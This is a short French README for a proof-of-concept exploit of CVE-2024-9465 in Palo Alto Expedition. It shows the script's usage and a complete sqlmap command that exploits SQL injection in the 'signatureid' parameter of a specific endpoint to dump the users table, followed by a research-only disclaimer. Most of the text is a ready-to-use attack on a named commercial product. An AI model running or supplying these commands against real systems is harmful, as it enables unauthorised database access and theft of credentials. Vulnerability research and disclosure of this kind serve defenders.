
Exploit preuve de concept pour CVE-2024-9465
Preuve de concept pour exploiter CVE-2024-9465 sur des appareils vulnérables.
Cause racine et indicateurs de compromission ici : https://www.horizon3.ai/attack-research/palo-alto-expedition-from-n-day-to-full-compromise/
% python3 CVE-2024-9465.py -h
usage: CVE-2024-9465.py [-h] -u URL
options:
-h, --help show this help message and exit
-u URL, --url URL The URL of the target
python3 sqlmap.py -u "https://<ip_address>/bin/configurations/parsers/Checkpoint/CHECKPOINT.php?action=im port&type=test&project=pandbRBAC&signatureid=1" -p signatureid -T users --dump
Ce logiciel a été créé uniquement à des fins de recherche académique et de développement de techniques défensives efficaces, et n’est pas destiné à être utilisé pour attaquer des systèmes sauf autorisation explicite. Les mainteneurs du projet ne sont pas responsables en cas d’utilisation abusive du logiciel. Utilisez-le de manière responsable.